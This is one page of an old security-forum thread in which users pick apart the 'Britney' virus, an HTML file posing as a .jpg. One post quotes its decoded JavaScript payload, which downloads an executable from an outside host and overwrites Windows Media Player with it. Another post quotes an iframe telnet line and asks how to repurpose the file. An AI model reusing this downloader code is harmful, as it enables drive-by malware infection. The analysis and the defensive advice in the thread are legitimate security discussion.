Britney Virus - Page 2
Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 24

Thread: Britney Virus

  1. #11
    Super Moderator: GMT Zone nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,192
    Yes, that's right, it just "hid" in the .jpg. I am inclined to agree that we are looking at a disguised executable here ( and our friend Gore certainly thinks that britney is executable )

    I was a bit worried when I saw the .jpg description on its own!

    Cheers
    If you cannot do someone any good: don't do them any harm....
    As long as you did this to one of these, the least of my little ones............you did it unto Me.
    What profiteth a man if he gains the entire World at the expense of his immortal soul?

  2. #12
    Like the mokkel.jpg file this file is also an html file (according to bash)
    Code:
    knoppix@ttyp1[knoppix]$ file britney.jpg
    britney.jpg: HTML document text
    Attached is the text.

  3. #13
    Now, RFC Compliant! Noia's Avatar
    Join Date
    Jan 2002
    Posts
    1,210
    * Kils "reset message" button *

    EDIT: Removed the URL encoded text because your browser evaluates is any way

    URL Decoded (Same as some one pasted earlier)
    var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://";
    I don't have time to fully decompile it, but it looks pretty clever.
    - Noia
    With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .:Bring OS X to x86!:.
    Og ingen kan minnast dei linne drag i dronningas andlet den fagre dag Då landet her kvilte i heilag fred og alle hadde kjærleik å elske med.

  4. #14
    Senior Member
    Join Date
    Sep 2003
    Posts
    554
    Well from what is being said, pretty soon me thinks that the internet will not be a safe place to wander around..
    It's like a mine field, one wrong click of that mouse and BOOOOOOOM..
    You got a Virus, Worm or you've had your system crashed..
    Anyhow when ever i'm in Irc i don't click none of those cheesey links, no matter how big the temptation would be..
    Because it will either be just another lame Porn site, or to something that doesn't interest me..
    But by the way it looks i'm glad that i didn't click that link now..
    I was so fruitin close to clickin it just to calm my curiosity..
    Anyhow
    Cheers

  5. #15
    Senior Member
    Join Date
    Jul 2003
    Posts
    113
    Originally posted here by creative_32X_mx
    Well from what is being said, pretty soon me thinks that the internet will not be a safe place to wander around..
    It's like a mine field, one wrong click of that mouse and BOOOOOOOM..
    You got a Virus, Worm or you've had your system crashed..
    Anyhow when ever i'm in Irc i don't click none of those cheesey links, no matter how big the temptation would be..
    Because it will either be just another lame Porn site, or to something that doesn't interest me..
    But by the way it looks i'm glad that i didn't click that link now..
    I was so fruitin close to clickin it just to calm my curiosity..
    Anyhow
    Cheers
    If you're referring to the britney virus, then it was smart not clicking. As they say "curiousity killed the cat".

  6. #16
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Originally posted here by Viper2026


    If you're referring to the britney virus, then it was smart not clicking. As they say "curiousity killed the cat".
    Well unless your a pussy you wont have much to worry about then right? Just use a *NIx box that you dont have hooked up online and you can prolly take this virii apart and see whats inside it.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  7. #17
    Senior Member
    Join Date
    Jul 2003
    Posts
    114
    Besides the obvious (NOT clicking unknow links), what can an average user do to prevent this kind of infection?

    I know that by email, if you disable the win option 'hide file extensions for know file types', you get to see the entire thing ur about to download, but in this case what can we do?
    Is disabling ActiveX downloads enough?

    We shouldn't need to be suspitious about everything virii makers suck !

  8. #18
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    I just modified that mokkel file so that it only does one telnet session so now if I want to telnet to a certain site i just go to that page. I was wondering what does the chr(34) do in this line:
    document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org:23" + chr(34) + ">")
    I thought maybe it had something to do with the lenght of the string but that doesn't seem to be the case. And is there a way to prompt for input so I can change the entry of the site to anything I want. Just trying to make use of something bad.

  9. #19
    Senior Member
    Join Date
    Jul 2003
    Posts
    113
    Originally posted here by h3r3tic
    I just modified that mokkel file so that it only does one telnet session so now if I want to telnet to a certain site i just go to that page. I was wondering what does the chr(34) do in this line:
    document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org:23" + chr(34) + ">")
    I thought maybe it had something to do with the lenght of the string but that doesn't seem to be the case. And is there a way to prompt for input so I can change the entry of the site to anything I want. Just trying to make use of something bad.
    Well I know that there is a javascript iframe explot with ie, that I don't think has been officially patched, so it looks as if that is calling telnet, and then it probably tells it to repeat somewhere else in the code (I haven't looked at it myself)

  10. #20
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Originally posted here by Sm0kinP0t
    Besides the obvious (NOT clicking unknow links), what can an average user do to prevent this kind of infection?


    Not open attachments called "****MyPC.exe" Not open ANY attachments they arent expecting. When they get an attachment, ask the person if they really sent it to them to be sure. Install update and run anti virii, install update and run a firewall, delete Windows, use Linux or any other OS on earth, take a computer basics class, read a computer book and LEARN.

    I know that by email, if you disable the win option 'hide file extensions for know file types', you get to see the entire thing ur about to download, but in this case what can we do?
    Not use outlook or any other Windows email client honestly. That stupid preview **** really gets ya.

    Is disabling ActiveX downloads enough?
    Prolly not

    We shouldn't need to be suspitious about everything virii makers suck !
    If it wasnt for virus writers, norton would never make a penny, there anti virii is there main product. Iv had virii before, well a few times from opening them myself knowing what they were. Virus writers are NOT the problem, OS writers ARE. Iv met a few virii writers who do not release there viruses for infection, but more or less turn it into an art form, and also for playing jokes. The original virii created on computers were on UNIX boxes and did basically one thing, play pranks.

    Thats all they usually are still. If your server gets taken down by this prank, then learn to update your software or not use Windows, which is what they write virii for. Why do they do that? Well, almost everyone uses Windows, so why go for anything else? Besides it's fun when bill gates blushes
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides